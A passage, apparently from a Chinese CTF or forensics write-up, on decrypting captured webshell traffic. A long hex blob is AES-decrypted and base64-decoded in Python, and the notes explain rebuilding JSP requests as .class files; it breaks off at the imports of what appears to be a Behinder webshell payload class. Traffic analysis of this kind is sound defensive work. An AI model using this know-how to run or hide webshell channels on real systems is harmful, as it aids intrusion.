0a8dc5927c89055eee30fa177f071788a255b64951bd2cb80715483dc366928dc636cf449b56a197f5fdce255fe906c771ad583774b2f9bf19416282f1d506c52085e881a938c2b35f4719dfeb790e64955ba2ccba55ff1a97f429a2f4d4048689d2d241ac0c7a23412bdb5b108c8d1910e466452ea7e4cff31b01a70d15e55360cc0bc21e0f6b0f2d4cf670ae9da5fd16a23bb07fa9457898e364cfb07ba4a94383595955df891e4eb372257eddebba59ce3534fae08d0cc153ea353687082d503fbf2dde886091cf5f2a71c5b75e41a602f5939eefa7b93c9734e1890265b0bcbc4d35bdfb2c36b3e23039e7689fc2bda6263d191f35a3ed99303c1230f44b5753a836d10f042002fdc03b01a87ec1fedaadd1182e1ae6a0fcba06e8d83b2ec145e23bfff214c7a950f3f05e0d6793a0d7596557d404fce6db194d9b7c0b795d63898532c8a5153264b0f9f5e6bab1e9510ef72221b01b9e30fcb0d151c5ab77f20defe862f93c2251b0c8dc2f6d73f0e6f2da7fc6a2558491f4eb815faf1a4968c3b07acae05eac3b5eb487dab0948dd1af3f780c970d14bc43b5fdcb023ea5b4b03a525ff1a336be5a5e2951740760d7da40807c9963b71ae0cec41e405678f074889c96f9d9c6b6fa8b323d39f9e54247fcf23b19fba59793e2ab0a3e8e4227d646c8421c0eef9a917d0ef6f949d31c2dae9ceff3097949eba9af358823f2ef13ca585c9499f2f9d4fad3665527f0e4b3dafee2c5d197d5e1bdbca833a9829882dcb8f1d4e6fbf1e2fe8ccf769a1c15c0aa2434abac03f373c0f98bb2d97aa9810ce14ee104589f39b5151d62b626a7deda29c6e7681c702f8246b4cecb277dd2e9168add37e3314f7071f5aec7f6bfa1924a7376de63d3b28be6feb3368f5ead374c592a297d85741c21723d44950d2658e3e4aa0c4040260ef72974e050d441865b386e9db64b147ab336e33372bb8d6a7a566febd6ed2b8bd5dc421aebc30267e1d60fa93baf814ce858a68e11762464fe65127cf2f78965e0ba1c9335eaf8e3f6e183dc6fe3b4b12daae299b2d5128b583829c385c1dbd3bde21b6defb015ce8b270fb58c1503b58c293a48ec219df253dd4f85cc0ac288b0b3b29039d69ca9f136dadcb5114569198235151c14d3c579e2b17eaadb4380af791289cd51c7cf7e8b26cc223b404b408ba1649304de010580c8ef39227390015b1cdd2afca2cf449c3f0c5b762bcf43b931652916e9c960e119fd748feb5c466da040badd166a7a02dbf2ff8be451412a3bafe95db9efe0de2d43ce7bdc1f86ab468e30b375b6e49a931dcf6374816d11edfc0fb754f11de60b144d2cb7823f6907c61aac1dc7229f089f15811776704eb924fe3ecb0cec5204b3be9840c3023f23a8c133917e876b62078ec21606394a5e67a4a3ec62d64c72fcb1de7e0f1f05413aeacec1132d3bea71d99c8e39a54420928af9a137b1cc218db360a3eef73440e42b447461252e7c5eca4a73fa9722d36a68a30b46e80da95740ad5073dd8b9ed45c7b514f600cbcc42e8797f64e265494404046701564707fa502cc17eb456104c77826ddb3cebc731e7230a8f0bba0ca4a4ffe8ad4c64f17a01027ea12d6f57e990c7d0f2a29dcef5150bccbeac36bbbece16dc1101f1d7fbf7c877fe9a08ef6dd27bc4029fbe382621ebd547657f11c3006fb60300fdc57af51fc80ef35f0cfe33d47cc7babe4b1ee0330c33347ca0e8129fb914537ee38ff23cf9dcf2d39bebe07583fd0002fd6e30fc815487380f8220d83f52013c054f0c622d83995e05ffd4a39ad42eb8c9f4bce0084eabcec13b83baac258b1b6a44f1549e7ee557be6d37c82e8a96c137bbaf2365a45c303709effff72207134378a9f90c2a15ca778e8590f517b4d23f770c73119c1b382d841059f88b668ebbbaeaf78578e0d30797d1efac8e095471451e6a62156268a85c9a4252bb1660ca1a270b34fd91e580931d45308c2092f9506b24e32cb4dcff5b10f1533b59b23187b5589b2c093c89fc92a16510679b832f62adb84c06277b5e1f4e653b9b807ffa103f4292ca811554e05777200d4d17643851d96b4d0ba244465e8f4f4fccd4548b29ac8a715251cf9275f517b4d23f770c73119c1b382d841059f88b668ebbbaeaf78578e0d30797d1ef167eeb3e3f3d29aa94cfeb289da885a7797b2efef7607f0481dee2338766b43160cc2d495c7a2421a5d045217e59bc8a215d64000495081a9e06fe038b9222b66e65ec816b2f7f898e8412191e8fb38ac76842bcc5bae9660d3578cec2e80f48950f7d9caea0f21bc05a327e0a6dd6070a3e0c5962a69e8bb74482744ebd765208ce7be7397b64476edd198cfbff9291f9922e9a3064301a920300a4733ff68910b25b8afeedd759bddb4dd0c5ddd93182aa29ad280225aa196242e9ca7308b6ebd37061e74cf0a43166c1a15bceb5b36c114afc6dde09b94ecbeecf687e7d33833a737efd1b8836917e98d2af7c02379231984bf7fa64d23e473c299c75719f5936da753acb418ef19727a7470cc9ed64d824c8753622b4fdd23ea37f0a45cc3ad1820007ad4c386185e3ebae2af30d425b84c9c19f2a8ed66c346aac26b79eb48263fd4c3a2f99ffe9b275040a5f2a2a4b53f9967ca2ad9928a8b319a78c4a59c99f941efba97dd9d122858128ed6750e061398a9141991386312fe300139a8408acb77d2257a8699cdf6e7587c07b643142861f0dddbd910d7f5f1dd23e3d3d6e30f189350f98d0dc21047e7d46cfe4526c7a4c066710dff24333b3fbf60e0c69e60fe0b6d59775ae0ee5620b12926ae3c9f155ba6ef7d2e3a72e67504aad9a35b86f6fb51b1ead69ff1172597a03aa90aa6c921566a77b9408a39683966536b3dd401817c8cb245c54ebc4a2da8a867cd2a7f25e4b02b5dd2ad1958de9362046ec3600c0fb139676ee9cd7dbdb0adf9369f5bd1292590f7014f658169960c6249037cec6319a678e8393e8629664cf33481c923d5c4fffc08fd313c27ee79538ef06c86cf50259de3a681f5b667c316f5d92a04de272bacca43307622ffb5e3227b26e4c8cb09878f4d031095bdf449d35d92ce3d23895642bd6654744c8fdaa68634548b7a2737d13481609d4fdcd538615864f713fda4a6a5afa49ddf6ad02852f8c62e67036a6c721c0c4c132ab66085c874930ea4d2285cc587ad7f2dd8ee17b09a74dcc81aed111161c183b70ebd51c41dbab8df6199021a8800b345c96e6fcc4a64f39cd82d898ca91410824318d2b8104f2104ed2806dba01f94c93c6f652f1a843281fb3de1651bd8716c84ddf163e3479ecf633200b6c9e40e3bd73c7f4aad2363d084562fefc4c667830e132757f75010d506520cd8d88e4926b39fc97b278e772eb9b6a9aad4882857e07e63e82fdbb3c705b497e7d70a04d7f7877701dc0f8f4e35efb72f27afa2fdef7ba0515bbd23ac14221ac17998e099c3ced8b32de0f4cec607ea710b5fad19e11546849e4611409ea3ff99bde59217c9ac1ac231dc7fc0b053add302fa414255cd3140a7cb110faafe1a792732e16edf90b09b0bb8de6f8b5c6fedb96644132923d360d3e92331779304bcaaf1461b7639ea417d1bb847d1ad231880c93a1fd9fd02c7288a4953b0a1f596beaaa1fc4610f1e1fc18f172c6195b32d2604fc1e6df03687f6794fb77ae6fed920e412e03c3fe6a501ee6d0ce1529d7c08af2c63d191f35a3ed99303c1230f44b5753a836d10f042002fdc03b01a87ec1fedaadd1182e1ae6a0fcba06e8d83b2ec145e23bfff214c7a950f3f05e0d6793a0d7596557d404fce6db194d9b7c0b795d63898532c8a5153264b0f9f5e6bab1e9510fab3e099b23b6c3b935f5a70e67b1f4e5b5d76a8b1498892bd291aed1530f88884bb284a23df517ae3729c8ab2f16170c717cfda6351879f30827e78d3b997507a2d79743de572c1d3d78c044685d4ad6f6221f00755dca3849084706f1aa07749e51e2b44542975c1ea87f11fd5267f5e945706035991643b6a820f748880ee13482f250c085f69da89c94bec76ec8a105a871008f125609149889092611fa76217f1f821b047a8738b23aa0fccbaa2615d46e79b536e4677bb4af888cdf7d07515fc59268b923b23110f17bc162390561a19493330276cc13b582267e6e9997c5c26990999883df4bc62fdc1420b9ab36a17bf4512a6ff3dd8a89236ee01bdded2019f73328b1979e9ee13bc731fed46f3ab9da7f8442f3cdaa0e6e3c346f81c135641c8822168f34cc15606d0a61dd2394849954c2b13d950e10bbfaa22b7e010580c8ef39227390015b1cdd2afca2cf449c3f0c5b762bcf43b931652916e9c960e119fd748feb5c466da040badd166a7a02dbf2ff8be451412a3bafe95db9efe0de2d43ce7bdc1f86ab468e30b3757429d368ad094f294247efa1c454386b57bb9af83b7d4595b94d0eb3c7cbe56422b4037f698f7977d74cd5a00326e025a45aa7bac4596c87fd53e4f0f0cf5f7e24840fe579ed81759e3e8bea1762e2d95480e65b4cadd896a2833e1b5781356a0b44b144fd4c5cf3f991f0007d26721c384512a56b1bfc1ef4a4174976a19da109ec8ae659ea22a5c706649c20e7074e010580c8ef39227390015b1cdd2afca2cf449c3f0c5b762bcf43b931652916e9c960e119fd748feb5c466da040badd166a7a02dbf2ff8be451412a3bafe95db9efe0de2d43ce7bdc1f86ab468e30b3757429d368ad094f294247efa1c4543865d8c4de22ef873f1ac5a867335ca4af29a35b86f6fb51b1ead69ff1172597a03aa90aa6c921566a77b9408a39683966572aaa2e74e115958541fcba8ad76b325582a6e3af9ceb4772cf10ac9f0a28a4ac3a20e96c2cb7d2c036b06f39fe0a8dcfb77cbc1200c8c2f51cbc00a2e75c52b6b4d9ad1b1820bf59031121174239af0d4fae2ad9993b64e147624d98e59c24e487f6c989d952099321b05bb9905374c656d53bb698130e40b03a20a211f37739389db7b0a0061ff42ad536bc5e20d53703a3012b6da94d2503f06103bd7a1993dce95cf201639972b82a477e3ff0e2aec4efb0b5371ff3c27084bd543227d5b561a19493330276cc13b582267e6e9997c5c26990999883df4bc62fdc1420b9ab36a17bf4512a6ff3dd8a89236ee01bdded2019f73328b1979e9ee13bc731fed46f3ab9da7f8442f3cdaa0e6e3c346f84c43dff34dc381ccf3ade766909ce421d7306f9291c825fd7845d80531ad2d82234ae8efe20f27537055b43d70d0afc0d3157bad43db7844be0a9e99fda98aa9a4b47b4823116814222fb8628a4d53f15f17e072bba1cfbe1767ad70a8a00625c6192ef3d342c9c5a93694b981189ec43d65c69b9883592993756a1fd47b52c9472b62005a63f99f39c4b68d32dec218d110e102c090d1be3b7ffbd75517404726d01473c24267aa6b40be66c04580f5dc7229f089f15811776704eb924fe3ecb0cec5204b3be9840c3023f23a8c133917e876b62078ec21606394a5e67a4a3ec62d64c72fcb1de7e0f1f05413aeacec1132d3bea71d99c8e39a54420928af9a137b1cc218db360a3eef73440e42b447461252e7c5eca4a73fa9722d36a68a307812adba4668d4e23439ad8ea99c499d79da1f75c9b344cd4b674634769331d0d4c49c187f53337a1f379e5aa66c5d26f449b56a197f5fdce255fe906c771ad526d182e5c51014e60230924d91c37baba4902b5a6696bbb16c51dba9230d3666dd2fab7a91eff9767bf6d645f68ddce12f70951fd986d4e176c8ae79b0a8e350f9b49dc64f2c9101789bf5362c276dc79a94615a2dd8fcbcd768cf0e3fb490bbfcbed1f6069b78688da35eb98ec916cfc9d6deb0d752c4ccbfe54f8f878f85a9f77c7676e8a59b001193576fe598352bbf6602a1b0c5cd26588be1f8033c7de8d172adfd08889ce164bfddb8bea229a005e5c7afa6e3494485c5c9131ce56773a34bee8f07ae83168dee849d66617d0d50fc70e7243a4f5dd22b520d44a8e124785ae501a2a35d170217a7ceb62995db13504151cc01bbf754547abd8383a2d70db071ed77074c4ea45d7c6d9c83a4011f173069d55f108e7bc40ef2bd2a772c34ed5a5bfb78e82af464477cd8cb81cd9c45067caba5e37b42e21c48d6625d978e8584c78816f9268a498f26860fbe77036c174e6da2413e5fc37d0fbd6489d293822fbe62b7ed9a8d3cf8cdda837415b0c0e061e5dbf734462e86e84961c382b6834f1c30b6d3f6be72cfb83b4f47c84d17dab431acea703cd06133311906f8318dc8495a4afcddf2ce772a2af2295ba8dd5c64a5714513c367263fed7b64fd3161f0d1f03d9e6fd765beba3d2aa8c7bece69660bb81bbf0757bb2beb230c7129cd301d21f31e96c35d904e02eb362c8ef8b2bc1bc854ce0d5e7b7ac78c87cf355744c8832cd7a9d1bd1574e2a0ff1c607721b84f6eb0cb9f21dc5ad77fa63de253b561ef6ad17f2e3a189d42e37e3ffe67bed2eac792b4057a7a7371517ece64049eb98b8bc967efb20a69723d1eb9fdcf4829b5d34fb64aeb3a1ae22ce9ac8c8d79a620e9f10a36acb7b1795d02ccd4fae2ad9993b64e147624d98e59c24e487f6c989d952099321b05bb9905374c656d53bb698130e40b03a20a211f37739389db7b0a0061ff42ad536bc5e20d53703a3012b6da94d2503f06103bd7a199d87d071c786f8a3dc2d807d6bf370f69c4d0d5ec8138cd68a99e7400b360083ad58ea3bd77acb80cb9fb4272c7f9cd3f3427ef0d9c3c93ae0164c1076714ca00b783cbec9e5c200dbe3caf73d33e5d2ae424bace5a75bb73d0dfd37ed4dba1823c69cb15e46f0eb4bb6fffe64e6fbe3e5e7a8cf9c51b8263780cf09e6d24081ad7853a2bccc238a60dd3bec0d19a154f428909eb3c695168c85f93d70064734b2d3796287f7c01b6bf9e807c6f9a5c19dc79d58d1993aaa4c6c4c1eeceb5177449eaa01c5efca412f99e6ca6f0d66dcb4b011a2fcee5e26d6b1d60ab88853f22153659638106df444ca99e27258fb32849698abe9cee7070c864b386fb88de48c31dbcbd5022a7e9acfca1bd93d0197619e271c46e9d58a1844d1e20698c968deb2482b961d1d7e9dff3f3078a704b792c8b1c2c4bf237cffffec455d7b984a2792221b00cf550976ec09f82ecfb48a5ebf23333006bbbd4932816b9c5918016a26457954592ba768235116c89a0a9992c2d0226cc8d81905ce14a92af7e47ed4034b2b6bb910aab00d6d2f3d39d02cc086a76184d89216b15cbf982b2e9b5ae122730676fdfb656ca1b765157082066d48bcd06d3bb83a79c627b956e973312c777ca3353d548287a49d2642578b2c4602941fd11129921ca3fdb5721c490939dc4508fc0322355e787c568d5289dff82ff451263f055669234cffda210e81b029239debc9a2620f2df8eae564071f12ad45316e0dc4c24f38fcc930693795b89160b6bbc7dfa4ab55584d036b4a2b31c158bbea3c9fd37990bf36a8be9bfa4087a2ce71ee558b7cb4b28a4411eeeee16e7d47c92ccf59a388ae9913c723cab78f9f269555a31552c343b79bf45f7ab9b0c873ffbe30e17e14a9c50ebd100654f79c35b90c4b5022a4a01ddae14af5783e06a3060948774a47efdd39407c2b66459e4095d3cfb6913d0a9db57e0bc48381d2674ec608f1864e7745bd8ba91f7ce0de2592eddf17ec2203237a8d8d8af944c8cc3d2dd6ec8461295591f21bfee3eaf2bf22c979f8dba67120fad44a5645355ee5bb5969e70416eb8e02ccedce29916fdb5580c9c4fc8daf8151592cdd26b600be6e311e01a07d82fcf7cde5f82ab9280ceb41df2d7f7ee85208734932f2a270f938c78319cd711cc092fcd1bc8a5596e15d70e9b301f24363645f77017981d309fb5907330a10e574417a077b646fe69a2f6bf3accc8bd2acff76d8f2941f418779f21c5aa673afadd9a0cc6771fccf337fac1b2c63c8a87fad2714215e52b315fc99b83c649b4a977938c2f559e6d28786f1f9225f16ffa583b9a56c8d0ebd8d5f04b44bf43afb7f9f292249400e2c96854c00e696b38ec7cc4cf7236d79c6d1e0dbed46cdedc801a01e009844bea063368b097439215e3b3ff41091b8a92e2e0e961e2203e89f3cbad234880066b1a3ea1dd5ed2da5b89bef2cce87c5c280a9888c33614d66259972758c0a606560be60e44c03c5454248dbd1923868f987df27c3adab452ef1b8a6d4c894fbf7aa63671974e7eb88632c6ad91c1ba68f6edc84b626f70862802dba2bb6c3c1b734cb347f7e1772f44ccede948ffbffa8cce6e746537ffd114904ed4ec3669234ae8efe20f27537055b43d70d0afc0d3157bad43db7844be0a9e99fda98aa9a4b47b4823116814222fb8628a4d53f15f17e072bba1cfbe1767ad70a8a00625c6192ef3d342c9c5a93694b981189ec40fe7ca338558d7fb97b09ccfedbb014fa17c61340e16f2d97a7ade44d753599bfaedd64bc84827ea1244a71e9fdad49827d1a950b0d22bce7139323ad27653925bed2e08fcf39f8e7dde1864dd3d048f1d8a848ae10046c50ed4f9e191fa8e02e59c5a99a78d7443ce864345d921fd9a7b1f8d2994251d098834deef0a2d2ba4ae0c32ec663193b8f5a3cb14b2d22ca8acb9b4fbe987d3b186f681a98fdfa991cced870c1611345ca5a9bcdfec2321cddf9fb015bf87c9b4d6edb1a97befd2df47e502fb1d9f0193c942090527fbf213df76ae31b8c44d42b7ae99979eac7e91e69b2a709bc237c7bda149c8f8254d6c0d32fe51732f1c1ea7e83012f5dd592d46fe69a2f6bf3accc8bd2acff76d8f29adf8dc9e55de86541ea7aa91be7c03eca3b749999b6f39219c7991abf75f5ad235a15d664486b48360286f3538c9f2c21063b2ea78bfa36380443cbfb35f3d8dd215a3ac5048a3d5bc10c9f6817282df111e1c28604be553f0e195230dcb4534a2f8fc3d960107c77455e247f21315cbca00b0177ab28b336a229caadcd14dc490025869c6e11021620960a5c7f99647eb5bbce69df483f58e9b707b7fb2180778a3852affbd03442ce2b5056691418d9f5771a41f7a1b5f6ad69d7bae5405ce5ef30b4da19a2eae97e2ba4efb748d084eb608982b37594b8750f081549d77ab301a970ac1116c45570b6ee811da60f5a9a4d5b73243dfbcdb42ffce5e428119beb4e5ac88d6826e3d5d2b7788e5dd891c0ccea01db909ce6eeb2721c7d4d505fd6dd309ac222d7905f1e0ecf4e46581fa2358466e6faf2f5e3494c1ee11f468495c85f998193910d813c0789e21b44549d5558c69eced67b5559df837de258a5e5d0c5b975d48dd959da2936644056fbc708d8f88091f0dd4953cd707b0f8acc9a7d990092243e285db444d7f20f848311caacfe1dc6d7716c43b32c6e1a5685ff07e04ff487500f402835e3114a92469b3c819c1cec86e1903b32a024e5f1c2c9f67f3aa02343ba5d50693a9d5266bff89272143c94461933b3278c33ee6b9b76bc1b3fb69c792a4dd47e2aabc6d54bae1b68fb935a08a3ecadbf9d38ae70c774181c1cde8c147f6842c251735b4fcbf047ccca714d69c8e6957df2f3a10b19e6e43939d2f63b8479ae29cd64f6bdca64811feadcd353f526ca3d5ea9f3dc0e751746c011541e6135a4219da5be9b923e8c0cd3e1f923218bd84c654636596cf2425d96eb8fb0d02dc5741dff3c091d867f74dfe155a44e9bf48ac77d53d7a86c07611fcf6946dfc1895341a520b2105e5c7afa6e3494485c5c9131ce56773a34bee8f07ae83168dee849d66617d0d50fc70e7243a4f5dd22b520d44a8e124785ae501a2a35d170217a7ceb62995dbeef8a8aca343dccd77acddfc2f2908866ddc8457a897f3a159524d1807735b575bb91c2d4f15d47d7c5af135c1fddad815fa90d118698893cb86907dc5f429fe5b6c0e257ffe77ab7933d52085eb5ee6134146017a921454641041eb9407e854cd2efdf122649551a5e4f6c5b0c6d9c2fb929960c20fa4c2b2ab0779833781aba0002ccbce7f862c1e93883cdfc524c59270716ad3514982d249aa7efe2164bb5ed2c128b79905d063e11c6a34676b1e1ff23fe341ebd4d4a73e04182428644da47066073db870804786ee39260ec01bd5545bb06f5ccdc5803b2ed5151e017d4eafe588120cbadc0634ea59ea5c03dfe4f9b48e33b21e1ad5e5c0cb571e23aae80a2c06953103e05ac4d9ccc9da6e5a9cd2c9f314d6f3ed3fd83faed0a449774ab6afe1a6835757687b02245737fbd582e61472c5f62ad8821cfd69dd196531a83856639430b4e3255c496bd7a0cc7dd01adc133a45c57849a29dbfb879057c772405009c6b5219e516086da0ded37b6305a7f87710950b480f5502185b97c9cd7d32fa6106a4db83210002037dbd99f734cf7444b689bb22c31024d14ea1530e2996d1cadf534bfc3a1f18494d0b4880ea27d210b06ee1d8c9d1a4941148ed02095df698403ed02dd16ee67ef49038b8986f30d059b792628ce9685339a4bbe85fb24d58e32cbc27086cda97b8fd32b5f86352199e6d8ff828c79b850c85ce63442257c4120a8c5f1cf3578afe8c05f541c369a3e99a6f0a94c68af7fd3d9376102e5060acffd62d4c4430278dc3b81564ce2a59482e984bcd019eec18863e76102e5060acffd62d4c4430278dc3b88bb04904d9d4bcdc89cc2c5ba2eb0133989ea252d9ec006a70988933ca535334da332d994f877b8d4cde317bb9290489a7bffc16a5c57d834aeb997164cbdb6f9bf4f856f62badc1a177ed8b28e9fea281c83c1fb0a4769d36b6cc504ec52fdcd86468d7040dbef21fe09be84ac6da541d894cefc685343ab3b1f2d37612b50e083f3735a961d9cb683c1d6e8a0c32fc4d5eabe4389bad9563db0a608a0f53cdb1cba0686db57d70b752402373741382ec5565628cbcd4620721ce21321afcd0f9beb17d017498ab76e17e3f8b11a0408500daee34f0c2010b0d2bb801a93e6920ae76b764ce0e47d011a509b194229f15a724f212d94210a41090e322aaece56df33c573211361b524cd056e14a9a3367b350859ea13e37bdb3dd56b9739fb4fee73724bb5b63a05c7bdb57d0f3f3209620320d0b6069a352bdf9c87b4b97e2376a585cc7e4411f5db74cf56c81fed9c4473d99c6a690db8ab651fc1e6462313d9f89074fc5e1ff15633ed61b2275d89eb7eeead2ce51997abde6c22461cc7d760af682c0e2b68f76a61ed396c9917baea483eb8dbc604726019a3dc859d03dc562507b00f281d595ec7b3825c3409fdae43185bbfe821ff32b9b0139fd6e9a96af3fe552bfd508ac0af9bef66f710671156aa2db8349a34b6868b95ad8889e384a37ca54c7389fbc71e4734e020886e4d7f203a224908d5db68791434d2cfafbf336f65b3712aa77e7bc91e7570548403082163c530fcbcc1db6d135f7a751fd688bc56bd968cc5fdb5f268af6d066c4a514337976c44b47d92174e2e8dc56bad31e1d78e165c3d7ebc22fadb436ca4309697e4a1720521b5f8615e3253bcf2ed080e56dc0db7ae8229da6fb5484279082d8bcf05b55723eabd2f52706f532c6a015169c30996c6c9f4c4dac82e8fc6e9ac29a2777930c31cc3f055982ea9c64fbd703592ed16c96a11f74bf4b2f5dd6388bd39fe68f57716eb76bd04274913e9ae750f31ee355631446e5ef8cdc93ac0280f2efe357d4475064c114e8ab6efed085532ddeea1b6a99774bbcfedd9db2e6638160044184e63a75f265e77bf982250679a5b5a91703b3a757de3e6a98ce4a62c19c7e627f05805360ac29d9d9878d12f9b3650d044b58aacc6b2babaa4ea41743f4e8125240af1fe29c8e44e1a3571f006a6aca05dbdd050c761a0a9efb6adf86bc7447b1de98fdb87a445663550b8654e076492b1fee8846516ed2854c67b92d10434791943a67321bef8fddf777d53e61dbe5751026c4efcb2c2ac4a71d826f9d9aae35f62e877275673e338fad70389be5fdfc936d73623f0370abc7992231430be8ef8b587fab9b4a9c689677f5e324183f276bfe0507eb82100602038c7e07715263a887d61934966fd0380ebe5e5520d708355bf9abaeac9acc68f798f2afa652acf4f421730b886ec782b5c80b585b77864af6178588e72b038c81b6a8c8e2c53e973f2170bbb8e3868bc662751f55093d985e827c29861816b09d346e8b82b147ac263a4b14a276799179c5a0df829d47ffd4b473f0a3cbb1d04216b532f08dfb5953df86d206d93c70d40ec371fa10f49d5886f1064dea65c161d1afaf6fe6bb14027fe568f49514fa8e5c99c2a06ed65e3be18c41f08ab817e8758922cf04c981c0effe04ec4974e05965cb3aef85ba7b7f99ea1048244bdf9597dc58cdf7e316dcccb2d0be89c6905941b67b01a9470a29bc42e81cf3b4ecad9f7e542191848acf2ccaadd39d992320aeebdcd1753166cc880f4d556f64e767285abb4211ae03582cf40e03ac98bdac71545e55bcf77bafd102344ea8fa554609f16bda2a40db73f9acb25006ba97777e35d6de56973b3ad7f188dd2d14eb61aea0248e2ed611fc4389b1828267cb1a4cf10cc9c09acfc6f7c0bba2c88df81b265a2bdc2a08cfeb1cdace58babdb86f8714623069573628e6538ed60eb8991ee0b89d7a049472009975fa87d3a57f61de5212fc1d99f66b319a298f31a08337b0cc3f5d0cd32bf7603f4dc3b3a2f9b49dc64f2c9101789bf5362c276dc79a94615a2dd8fcbcd768cf0e3fb490bbb59f85b633e86e453896e67911d225ecfe3d36bec8e2118788c44c74c7b08b1d14dc893af4afad3322790e4bf66471862071d7e72ac7787aa954109991cec1df83a28934ee251cf72557397f14deca1b19b53e091ef1f8a22c7c410766dd32a8fb6c2894951924faeeb2dc69962a5a1ed3787143d778b9d040f4ae32a17f130982347fdb1cb414dc116d5b95f0cdcadd5613a3d6c892fe3e958fa1a2c998aa6096b04e1827d8d4d9b8dd6f1b9cfdfb936736bd427dbf3e687acd4f169979f01bd06949818793fcefb51d076cba42df8d7d66eacd9ae175e7e25e2d906c375ce3c047ff3f90fffe6156b373f0db50787e99035853704ca16f1adf6a0db15f99453f796cc594a1b566d9d70a08327ea04e82e60496d7c124b170192801b95ca0350ee388195c79e64c500ea3a9c7df0807707a42636310dbfc0e0dcb40f9781430e7300658f0eb4d4e2682e93855dc45b6880b63bf283552e62f4fb3ffd39df0885dbecadb6c14908dfcda7b226ddbaf2ad9e367f7458695e8e4d081d750981cc69e227af28343e9eee00b156047ba5ca38a307199c2da6d3beb0322d975b1ad0443088991d8d3d1a5fcb10bb201fce7c50c71013179ba5f45fe33fede087b62aaa7ee219c0627815efde497dd75204bed83a28934ee251cf72557397f14deca1b19b53e091ef1f8a22c7c410766dd32a8fb6c2894951924faeeb2dc69962a5a1e3f00a322cb49b5be8d001571a62913508f7de66b8c31abde5b060b1c3def8eec82347fdb1cb414dc116d5b95f0cdcadd5613a3d6c892fe3e958fa1a2c998aa6096b04e1827d8d4d9b8dd6f1b9cfdfb93892015d4f1adb5547c5c6e5764219ca514e8751db9f673ddde26a1642191d5988edb0fb973237ff57ac2b2b8d19ad693f0ee233798c685ae98f92bdbef5c1ec157b16ab6fc9000fb65366d06e8c5029b7b559f4bb28172a338932116f331c1eb6b39fc97b278e772eb9b6a9aad48828559e8c7077a5d2c68c327ade030967c17a46c415ef1434e25d93cbdeebe4a1cecb0872b92d93a34707e299185d8242b270f723927fda7503367c2418d0f749ced167075988c5534bcc43f520802f0c8234195a704f77c6e3905933b15618a67fdc9d7c0746289899d9d897bfe861cb5644dd80ceab97a3c0b6f4f7ad2fae4becca0ceae81b9a182f32fbf552b26968ee35f76072347c43ab4d02765777915829ad34d7b598dbf1f819aa3a12042adfef09e7f7ae9a4d5a06313437dff4004314841851e3f9c385596d0db6f434070b6e1202472d747a590a77d9693c688ecbee25cb4a1d45d115c1a47b46f2e8ec4f51461ac5f72480601678c1c76d499b1aa45ae7dcc2abf320496c3c55c5417b94c8c7dc51a411684bd0aa15115bebd2cc481b76bc1b3fb69c792a4dd47e2aabc6d541348b175dbd1eacbf8c31e30ced7ef3cdbffc7279d92262361442b72850e0e0fc8d56e0e3fac60c32909e1273c810a3019427072cfff3882c9ac6fae5ee5075a9c0347d595964d781948ab841577c8e29a562a83e21ef95c95d6fe59d393b08bffa1ffa37e5d11430149966ace4fdab5ee682d1026e5a03e6f09e8ef3cbbfaf565e4f0b30c0243d5d83b84e5f6c130b07c55197b108d2cb7cf0ff4b1119be8e582347fdb1cb414dc116d5b95f0cdcadd5613a3d6c892fe3e958fa1a2c998aa6096b04e1827d8d4d9b8dd6f1b9cfdfb9301ebc70918cfef17c5c9b3b46deb61ad255cd3140a7cb110faafe1a792732e16dc03797ced7608482045986b7831c62982b2c75564dacb7caf34b6b28abbd057da6aa8df30303f4ae92bf3e36165a9177646bc2362c25f2ce48921f94ea29ebde117e6b2129347ca9b378080f5332a75b40b92bb9348fa40748e547d7f1440622b18d542ae1e21c2ca2018fab0e9681feda29c6e7681c702f8246b4cecb277dd648eef40fca9b40b13d8ba780b352d19ad8aa2806a4f5a9f99f480a51735be0fb6121857f11b9d19192afec6dff13afdf3f93e9eea285d27e95325ae0ff9622a8fd4b427976a5d850036871fb36b978d7a755789d9649a5cd97ed675a3d9b636f51c7ab985c5443eba16cea18dfa7f0f48aec3465549d59dd68f81441ffebdaf14cc3298ca9b58247d8cdfc19e22dcbe94296b757308c3c569a052493da67c20141be89bad29c8c586996bc5ba182e00a0f4007bf68ff7e17b6929f60ba68ac52ea808a9823fd6dbfeeb8221dad228015a45ea790f5c4d413b7472dac558b9dfcf8f028cb6f4a4c3732ccb9dee93743146676c8ccef9c20ad636c35b63aa727ce75c78abf5b0b5723ac812dd1957471c98e9c1c66493bb7ee703f646465be8d60eb95eb8b63e47bdb0295c4616f5b12e9a35b86f6fb51b1ead69ff1172597a0376a3d6f0b0453533d6ae0869319487172c2b24da8414d0b59af97324ecf6020c979094cbd1f731337414e6a99f779342b7b26ee7264ccbf6702b83217d42c62d05ceb686982980d04fdafa3322c4aa0862c47e9ff6a8ce2f8dee654b31983e3fc3490dadda17d3c54e88ee7b6090bb7c1e2c93ed7e582b47f6f606642d30d804dcb952ab9953e2571881e6d2e02bc75d83a28934ee251cf72557397f14deca1b19b53e091ef1f8a22c7c410766dd32a8fb6c2894951924faeeb2dc69962a5a1eede915bf61b6a1086d275cb67ab0089f7e22a9e1c37bfd78225bc3f8336474f257f26305ac2b982d81bafb3d6bdc730ca15723cb0cc6cf6bc8a81b88b3f43c9c2ece335d983c1f96531e897f3408692bb018d5dcfd4f5ac30551f7052e204ba38b66ae5c71a3f15f5f124b3d2d4867865e40b6a38c1dcb52fb0de17750774915029239debc9a2620f2df8eae564071f103937226691142192f4195d4dd253f1a3eaf2bf22c979f8dba67120fad44a564367636fb16c80e9c30bdccd637134736361636257eb3997ce5ab56a2054141b9529ffab433839b512da65146b016ce51c574f3b8bd38095fcd8293cdcbcf68af123705ded24d48564baccd7a5d2f5e0d17e8758922cf04c981c0effe04ec49743eace5d391f7b8f776e4e21313253331552c308ec91b0e116ec52e1aec6257d658f0f6973340b24d8143c229031701cc9b5f84b4182c48cb095b5c7dfd0e217aceb36537ba3faed27fe2438fbeaf8c04589e8839d0041bbe1504bafa4001b0d0e2f88432c886bc93f5f3647e553f3edd5be6c563efc426d21f2c3ff64a0e318709f3cd94f3399a6eee9734050c1236c63f7721894239bc8428a10195d6b2d656df1164e6a5e29e78cb12b6e10ebbae56a062d0ee814008ee8697fc685d82e7b8'
    s=binascii.a2b_hex(s)
    s=aes_decode(s,key)
    # import json
    s=json.loads(s)
    
    for i in s:
        print(base64.b64decode(s[i]))

得到2.0的密钥即可解密请求与响应流量
tips：
jsp请求的流量还原为.class文件
后续用反编译即可还原请求 请求内容如下：

package net.rebeyond.behinder.payload.java;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
